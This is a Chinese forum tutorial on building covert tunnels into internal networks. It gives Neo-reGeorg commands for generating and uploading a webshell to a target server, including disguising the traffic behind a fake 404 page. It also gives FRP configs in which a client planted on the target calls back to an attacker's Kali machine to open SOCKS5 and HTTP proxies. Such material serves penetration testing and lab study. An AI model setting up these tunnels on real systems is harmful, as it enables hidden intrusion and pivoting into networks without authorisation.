内网穿透

打印 上一主题 下一主题

主题 855|帖子 855|积分 2565

NEO-regeorg隐蔽隧道搭建

由python写的一个http代理工具
基本使用

1.设置一个连接密码
  1. python .\neoreg.py generate -k 连接密码 -o 指定输出目录
  2. 例如
  3. python .\neoreg.py generate -k passwd
复制代码
2.再将生成出来的木马文件上传到目标服务器上
3.连接目标 脚本会自动生成一个sockets5的代理映射在本地的1080端口以上供我们使用。
使用sockets5:127.0.0.1:1080即可
  1. python .\neoreg.py -k passwd -u 目标地址
  2. 例如
  3. python .\neoreg.py -k passwd -u http://www.tst.com/tunnel.php<br><br>#连接的时候发现error 可以使用--skip进行略过开启<br>python .\neoreg.py -k pass -u http://www.test.com/tunnel.php --skip<br>关键是有没有包含requests包<br>pip3 install requests
复制代码
4.一般来说都是通过200的页面去链接,neoreg可以伪造404页面进行连接
  1. python .\neoreg.py -k passwd  --file 404.html --httpcode 404 -o test2
复制代码
 FRP隧道连接

https://github.com/fatedier/frp/releases
1.socks5反向代理
  1. 配置服务端<br>[common]<br>bind_addr=0.0.0.0<br>bind_port=1234<br>[socks5]<br>type=tcp<br>remote_port=1080<br>plugin=socks5<br><br>配置客户端<br>[common]<br>server_addr=kali's ip<br>server_port=1234<br>[socks5]<br>type=tcp<br>remote_port=1080<br>plugin=socks5
复制代码
proxychains添加socks5代理
2.HTTP的反向代理
  1. 配置服务端,将frps以及frps.ini上传到攻击机如下
  2. [common]
  3. bind_addr=0.0.0.0    #frp配置监听ip
  4. bind_port=1234       #frp配置监听端口
  5. [http_proxy]
  6. type=tcp        
  7. remote_port=1080   #http代理端口
  8. plugin=http_proxy  #使用http代理<br><br>配置客户端,将frpc和frpc.ini上传到靶机<br>[common]<br>server_addr=kali's ip<br>server_port=1234<br>[http_proxy]<br>type=tcp<br>remote_port=1080<br>plugin=http_proxy<br><br>#利用<br>frps -c frps.ini<br>frpc -c frpc.ini<br><br>#再添加http代理端口1080
复制代码
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

忿忿的泥巴坨

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表